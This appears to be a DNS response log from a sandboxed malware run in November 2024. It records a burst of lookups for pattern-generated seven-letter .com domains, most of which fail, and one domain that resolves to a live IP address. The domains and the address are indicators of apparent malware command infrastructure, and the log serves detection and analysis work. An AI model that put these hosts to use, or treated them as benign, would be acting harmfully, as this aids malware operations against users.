Nov 11, 2024 18:13:21.759999037 CET	1.1.1.1	192.168.2.6	0x2ee2	Name error (3)	vonycaf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.760024071 CET	1.1.1.1	192.168.2.6	0x7303	Name error (3)	vojykyf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.760956049 CET	1.1.1.1	192.168.2.6	0xf6ae	Name error (3)	lymyfyn.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.763142109 CET	1.1.1.1	192.168.2.6	0x8924	Name error (3)	pumycav.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.764559031 CET	1.1.1.1	192.168.2.6	0x8256	Name error (3)	galyryz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.767045021 CET	1.1.1.1	192.168.2.6	0xd5bd	Name error (3)	puvypoq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.770196915 CET	1.1.1.1	192.168.2.6	0xb52b	Name error (3)	vowyguf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.772232056 CET	1.1.1.1	192.168.2.6	0x99d5	Name error (3)	pufyweq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.780869961 CET	1.1.1.1	192.168.2.6	0x7aca	Name error (3)	lyvysaj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.782037973 CET	1.1.1.1	192.168.2.6	0xb88	Name error (3)	lysygij.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.790100098 CET	1.1.1.1	192.168.2.6	0x9ecc	Name error (3)	puzyxip.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.809864998 CET	1.1.1.1	192.168.2.6	0xba88	Name error (3)	qedyqal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.842200041 CET	1.1.1.1	192.168.2.6	0x31f2	Name error (3)	gadyqaw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.444658041 CET	1.1.1.1	192.168.2.6	0x132	Name error (3)	lysyfed.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.447108030 CET	1.1.1.1	192.168.2.6	0xdab7	Name error (3)	lymyxir.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.460479975 CET	1.1.1.1	192.168.2.6	0xc36	Name error (3)	lyxywen.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.468046904 CET	1.1.1.1	192.168.2.6	0x24b3	Name error (3)	pumyxul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.468614101 CET	1.1.1.1	192.168.2.6	0x6fe8	Name error (3)	galyqoh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.475627899 CET	1.1.1.1	192.168.2.6	0x5374	Name error (3)	volyqam.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.479010105 CET	1.1.1.1	192.168.2.6	0x8661	Name error (3)	vowycok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.480027914 CET	1.1.1.1	192.168.2.6	0xdf4b	Name error (3)	vojyjot.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.489236116 CET	1.1.1.1	192.168.2.6	0x4a33	Name error (3)	gaqycow.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.504832029 CET	1.1.1.1	192.168.2.6	0xa6dc	Name error (3)	qebytuv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.510704041 CET	1.1.1.1	192.168.2.6	0x29f4	Name error (3)	vonypic.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.511251926 CET	1.1.1.1	192.168.2.6	0x4ec8	Name error (3)	lysynun.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.511934996 CET	1.1.1.1	192.168.2.6	0x97e9	Name error (3)	lymysox.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.512387037 CET	1.1.1.1	192.168.2.6	0xd4ef	Name error (3)	pufymiv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.512397051 CET	1.1.1.1	192.168.2.6	0x640f	Name error (3)	qedynug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.513252974 CET	1.1.1.1	192.168.2.6	0x8905	Name error (3)	qeqyxil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.513776064 CET	1.1.1.1	192.168.2.6	0x24cd	Name error (3)	qexyluq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.517651081 CET	1.1.1.1	192.168.2.6	0xc6cf	Name error (3)	lykyjar.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.519325972 CET	1.1.1.1	192.168.2.6	0x7211	Name error (3)	lyryfyr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.521266937 CET	1.1.1.1	192.168.2.6	0xa376	Name error (3)	gacyzuh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.521430969 CET	1.1.1.1	192.168.2.6	0x8300	Name error (3)	galykew.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.527525902 CET	1.1.1.1	192.168.2.6	0x59c	Name error (3)	qekykal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.533894062 CET	1.1.1.1	192.168.2.6	0xded0	Name error (3)	pupybyg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.533952951 CET	1.1.1.1	192.168.2.6	0x19bc	Name error (3)	puzywag.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.536997080 CET	1.1.1.1	192.168.2.6	0x3508	Name error (3)	pumypop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.537573099 CET	1.1.1.1	192.168.2.6	0x95ec	Name error (3)	pujyjol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.540813923 CET	1.1.1.1	192.168.2.6	0xa917	Name error (3)	vojyqac.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.541982889 CET	1.1.1.1	192.168.2.6	0xcd9c	Name error (3)	pufygup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.542494059 CET	1.1.1.1	192.168.2.6	0x9d0d	Name error (3)	vowydet.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.542558908 CET	1.1.1.1	192.168.2.6	0xa880	Name error (3)	lyryvaj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.545531034 CET	1.1.1.1	192.168.2.6	0xb36e	Name error (3)	gadyfys.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.550561905 CET	1.1.1.1	192.168.2.6	0x28cf	Name error (3)	qebyxog.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.551043987 CET	1.1.1.1	192.168.2.6	0xa485	Name error (3)	gahyqas.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.551783085 CET	1.1.1.1	192.168.2.6	0xacb7	Name error (3)	pujywep.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.551811934 CET	1.1.1.1	192.168.2.6	0x52e8	Name error (3)	gatyfuw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.551821947 CET	1.1.1.1	192.168.2.6	0x401e	Name error (3)	gatyveh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.552357912 CET	1.1.1.1	192.168.2.6	0xed81	Name error (3)	vopybym.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.552921057 CET	1.1.1.1	192.168.2.6	0x2cc8	Name error (3)	lyvytud.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.553788900 CET	1.1.1.1	192.168.2.6	0xcc1f	Name error (3)	lygygux.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.553800106 CET	1.1.1.1	192.168.2.6	0xacd7	Name error (3)	vocyzum.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.554068089 CET	1.1.1.1	192.168.2.6	0xdab2	Name error (3)	puvytuv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.554419994 CET	1.1.1.1	192.168.2.6	0x4e84	Name error (3)	qetyfyl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.554514885 CET	1.1.1.1	192.168.2.6	0x4752	Name error (3)	gadynub.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.554913044 CET	1.1.1.1	192.168.2.6	0x2336	Name error (3)	volykek.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.555010080 CET	1.1.1.1	192.168.2.6	0xa7ce	Name error (3)	lygymod.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.555126905 CET	1.1.1.1	192.168.2.6	0xe	Name error (3)	purydel.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.555639029 CET	1.1.1.1	192.168.2.6	0xa018	Name error (3)	vofymif.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.556025982 CET	1.1.1.1	192.168.2.6	0x58ca	Name error (3)	qedyfyv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.556221962 CET	1.1.1.1	192.168.2.6	0xc874	Name error (3)	gaqydaz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.557035923 CET	1.1.1.1	192.168.2.6	0x3a91	Name error (3)	purycaq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.557390928 CET	1.1.1.1	192.168.2.6	0xad3f	Name error (3)	puzylyq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.557707071 CET	1.1.1.1	192.168.2.6	0x7e9d	Name error (3)	qegyqov.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.561007977 CET	1.1.1.1	192.168.2.6	0x6f07	Name error (3)	vofyguc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.563862085 CET	1.1.1.1	192.168.2.6	0x5c43	Name error (3)	lyvyxin.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.563996077 CET	1.1.1.1	192.168.2.6	0x3696	Name error (3)	vocyryf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.565192938 CET	1.1.1.1	192.168.2.6	0x6e74	Name error (3)	qegyhip.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.571997881 CET	1.1.1.1	192.168.2.6	0x753e	Name error (3)	qetyveq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.572665930 CET	1.1.1.1	192.168.2.6	0x9ab6	Name error (3)	qeqysap.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.575990915 CET	1.1.1.1	192.168.2.6	0x1adc	Name error (3)	ganypis.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.578619003 CET	1.1.1.1	192.168.2.6	0xf8a4	Name error (3)	qexyreg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.591330051 CET	1.1.1.1	192.168.2.6	0x3827	Name error (3)	puvyxig.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.596040964 CET	1.1.1.1	192.168.2.6	0xe2af	Name error (3)	lyxylyj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.596061945 CET	1.1.1.1	192.168.2.6	0x8d3b	Name error (3)	gacyryb.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.727392912 CET	1.1.1.1	192.168.2.6	0x6275	No error (0)	gahyhiz.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.344611883 CET	1.1.1.1	192.168.2.6	0xf7a1	Name error (3)	vocykec.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.347166061 CET	1.1.1.1	192.168.2.6	0xcc	Name error (3)	lyryson.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.347470045 CET	1.1.1.1	192.168.2.6	0xc45e	Name error (3)	purypig.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.355875969 CET	1.1.1.1	192.168.2.6	0x7a1	Name error (3)	qegynul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.362227917 CET	1.1.1.1	192.168.2.6	0x60b1	Name error (3)	qexykav.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.365264893 CET	1.1.1.1	192.168.2.6	0xef97	Name error (3)	gahynuw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.367264986 CET	1.1.1.1	192.168.2.6	0xd5cc	Name error (3)	lyxyjod.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.376566887 CET	1.1.1.1	192.168.2.6	0xfcee	Name error (3)	vowypim.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.377367020 CET	1.1.1.1	192.168.2.6	0xd908	Name error (3)	gaqypuh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.378181934 CET	1.1.1.1	192.168.2.6	0xc3e1	Name error (3)	puzymup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.380959988 CET	1.1.1.1	192.168.2.6	0xee8	Name error (3)	qetysog.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.387126923 CET	1.1.1.1	192.168.2.6	0x712e	Name error (3)	vojymuk.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.389961004 CET	1.1.1.1	192.168.2.6	0x5b80	Name error (3)	vofybet.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.394072056 CET	1.1.1.1	192.168.2.6	0x9203	Name error (3)	qexyqip.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.400760889 CET	1.1.1.1	192.168.2.6	0xfcd3	Name error (3)	vocyqot.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.408274889 CET	1.1.1.1	192.168.2.6	0x4727	Name error (3)	qetyxiv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.411210060 CET	1.1.1.1	192.168.2.6	0x31d0	Name error (3)	qebyrel.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.411233902 CET	1.1.1.1	192.168.2.6	0x7820	Name error (3)	gaqyzyb.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.414000988 CET	1.1.1.1	192.168.2.6	0x2806	Name error (3)	puvylep.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.416166067 CET	1.1.1.1	192.168.2.6	0xaa35	Name error (3)	gahyfyh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.416234970 CET	1.1.1.1	192.168.2.6	0x151a	Name error (3)	puzyjov.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.417365074 CET	1.1.1.1	192.168.2.6	0x98fc	Name error (3)	pupydev.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.417437077 CET	1.1.1.1	192.168.2.6	0x6f15	Name error (3)	qeqytuq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.417833090 CET	1.1.1.1	192.168.2.6	0xe76b	Name error (3)	lymytuj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.425992966 CET	1.1.1.1	192.168.2.6	0x30ef	Name error (3)	lygyfej.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.432012081 CET	1.1.1.1	192.168.2.6	0x92b7	Name error (3)	ganyrew.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.433995008 CET	1.1.1.1	192.168.2.6	0xa150	Name error (3)	lykygun.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.438604116 CET	1.1.1.1	192.168.2.6	0x3d2c	Name error (3)	lyvylyx.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.438865900 CET	1.1.1.1	192.168.2.6	0x9e49	Name error (3)	ganyzuz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.471910954 CET	1.1.1.1	192.168.2.6	0xb8f7	Name error (3)	lykymij.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.475605011 CET	1.1.1.1	192.168.2.6	0x813	Name error (3)	lyryxud.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.475704908 CET	1.1.1.1	192.168.2.6	0xa6df	Name error (3)	gatydab.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.489553928 CET	1.1.1.1	192.168.2.6	0x6379	Name error (3)	qedyvap.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.489953995 CET	1.1.1.1	192.168.2.6	0x1136	Name error (3)	lysyvax.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.490494013 CET	1.1.1.1	192.168.2.6	0x631b	Name error (3)	gatycis.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.490791082 CET	1.1.1.1	192.168.2.6	0x61d2	Name error (3)	vopycoc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.490803957 CET	1.1.1.1	192.168.2.6	0xe87b	Name error (3)	vojygym.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.491192102 CET	1.1.1.1	192.168.2.6	0x5a4e	Name error (3)	puryxuv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.491468906 CET	1.1.1.1	192.168.2.6	0x1bed	Name error (3)	pujygug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.491482019 CET	1.1.1.1	192.168.2.6	0xb238	Name error (3)	vowyzuf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.491494894 CET	1.1.1.1	192.168.2.6	0x3bdd	Name error (3)	lyxymix.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.491513014 CET	1.1.1.1	192.168.2.6	0x6fdb	Name error (3)	vopydaf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.491759062 CET	1.1.1.1	192.168.2.6	0xffdf	Name error (3)	gadyvez.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.491934061 CET	1.1.1.1	192.168.2.6	0xf3ed	Name error (3)	pufybyl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.492178917 CET	1.1.1.1	192.168.2.6	0x32c	Name error (3)	gacyqoz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.492511988 CET	1.1.1.1	192.168.2.6	0x599e	Name error (3)	qekyqoq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.492677927 CET	1.1.1.1	192.168.2.6	0xe63f	Name error (3)	pujymiq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.492808104 CET	1.1.1.1	192.168.2.6	0x41e0	Name error (3)	qeqylyg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.493463993 CET	1.1.1.1	192.168.2.6	0x3545	Name error (3)	vonyzut.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.494076967 CET	1.1.1.1	192.168.2.6	0xba3c	Name error (3)	vonyryk.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.495903015 CET	1.1.1.1	192.168.2.6	0xf84e	Name error (3)	lyvywar.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.497052908 CET	1.1.1.1	192.168.2.6	0x3fac	Name error (3)	pufydaq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.497939110 CET	1.1.1.1	192.168.2.6	0x65fe	Name error (3)	volyjif.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.498958111 CET	1.1.1.1	192.168.2.6	0xc6cc	Name error (3)	galyhib.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.501844883 CET	1.1.1.1	192.168.2.6	0xf46f	Name error (3)	gadydow.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.502300978 CET	1.1.1.1	192.168.2.6	0x917b	Name error (3)	qebylyp.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.503083944 CET	1.1.1.1	192.168.2.6	0x7c6d	Name error (3)	lygynyr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.510977983 CET	1.1.1.1	192.168.2.6	0xb49c	Name error (3)	pumytyq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.511764050 CET	1.1.1.1	192.168.2.6	0xcb31	Name error (3)	puvywal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.513237000 CET	1.1.1.1	192.168.2.6	0xed86	Name error (3)	qegyfeq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.520126104 CET	1.1.1.1	192.168.2.6	0x38d9	Name error (3)	gacykas.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.521851063 CET	1.1.1.1	192.168.2.6	0xeb10	Name error (3)	qekyhug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.521862984 CET	1.1.1.1	192.168.2.6	0xf097	Name error (3)	vofydak.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.006005049 CET	1.1.1.1	192.168.2.6	0x1838	Name error (3)	lykynyd.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.010194063 CET	1.1.1.1	192.168.2.6	0x8898	Name error (3)	qekynyv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.010629892 CET	1.1.1.1	192.168.2.6	0x1664	Name error (3)	gadycih.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.025182009 CET	1.1.1.1	192.168.2.6	0xc477	Name error (3)	pupypil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.027214050 CET	1.1.1.1	192.168.2.6	0xcfb	Name error (3)	qedysol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.027487993 CET	1.1.1.1	192.168.2.6	0x9e19	Name error (3)	ganykah.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.029839039 CET	1.1.1.1	192.168.2.6	0xd3b9	Name error (3)	lymylen.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.031019926 CET	1.1.1.1	192.168.2.6	0xfb5a	Name error (3)	vofycim.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.040637016 CET	1.1.1.1	192.168.2.6	0x88d1	Name error (3)	puzygyl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.041786909 CET	1.1.1.1	192.168.2.6	0x7c4e	Name error (3)	vonykam.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.050559998 CET	1.1.1.1	192.168.2.6	0x4a4f	Name error (3)	lysysir.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.050966024 CET	1.1.1.1	192.168.2.6	0x6cdc	Name error (3)	lykyfax.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.057480097 CET	1.1.1.1	192.168.2.6	0x8f6f	Name error (3)	vopyzyk.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.058725119 CET	1.1.1.1	192.168.2.6	0x5d5	Name error (3)	pupyxuq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.059501886 CET	1.1.1.1	192.168.2.6	0x636f	Name error (3)	qekyfep.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.063960075 CET	1.1.1.1	192.168.2.6	0x9827	Name error (3)	pumywov.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.067270994 CET	1.1.1.1	192.168.2.6	0xb8f2	Name error (3)	qexynyq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.073503971 CET	1.1.1.1	192.168.2.6	0xf3cc	Name error (3)	qedyxuq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.073774099 CET	1.1.1.1	192.168.2.6	0x5715	Name error (3)	qebyqig.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.075752974 CET	1.1.1.1	192.168.2.6	0x916c	Name error (3)	gaqyres.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.078632116 CET	1.1.1.1	192.168.2.6	0xcbcc	Name error (3)	lygyvon.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.079226971 CET	1.1.1.1	192.168.2.6	0x4ded	Name error (3)	lysyxuj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.079935074 CET	1.1.1.1	192.168.2.6	0xd22f	Name error (3)	lymywad.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.079947948 CET	1.1.1.1	192.168.2.6	0xcf93	Name error (3)	galyfez.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.080070019 CET	1.1.1.1	192.168.2.6	0xe200	Name error (3)	ganyqib.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.080240965 CET	1.1.1.1	192.168.2.6	0x72b8	Name error (3)	qegyvag.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.080252886 CET	1.1.1.1	192.168.2.6	0x1aef	Name error (3)	gahyvab.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.080879927 CET	1.1.1.1	192.168.2.6	0x7bf2	Name error (3)	vonyqof.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.082138062 CET	1.1.1.1	192.168.2.6	0xce3e	Name error (3)	vojydoc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.082501888 CET	1.1.1.1	192.168.2.6	0x89d3	Name error (3)	purylal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.082514048 CET	1.1.1.1	192.168.2.6	0x6c03	Name error (3)	lyvymun.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.082943916 CET	1.1.1.1	192.168.2.6	0xab1a	Name error (3)	gahydos.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.082956076 CET	1.1.1.1	192.168.2.6	0xab9c	Name error (3)	qetytup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.083508968 CET	1.1.1.1	192.168.2.6	0x686e	Name error (3)	pujydap.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.083719969 CET	1.1.1.1	192.168.2.6	0x5265	Name error (3)	vowyrec.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.084719896 CET	1.1.1.1	192.168.2.6	0x146a	Name error (3)	purytyp.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.087094069 CET	1.1.1.1	192.168.2.6	0x9dcb	Name error (3)	vowykat.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.087105036 CET	1.1.1.1	192.168.2.6	0x574c	Name error (3)	gacynyh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.087383032 CET	1.1.1.1	192.168.2.6	0xb3a5	Name error (3)	qegysiv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.088143110 CET	1.1.1.1	192.168.2.6	0x67da	Name error (3)	qeqyrav.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.089390993 CET	1.1.1.1	192.168.2.6	0xb50f	Name error (3)	puvyjiq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.096904039 CET	1.1.1.1	192.168.2.6	0xe7f8	Name error (3)	lyxygur.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.097140074 CET	1.1.1.1	192.168.2.6	0x106a	Name error (3)	gacyhuw.com	none	none	A (IP address)	IN (0x0001)	false
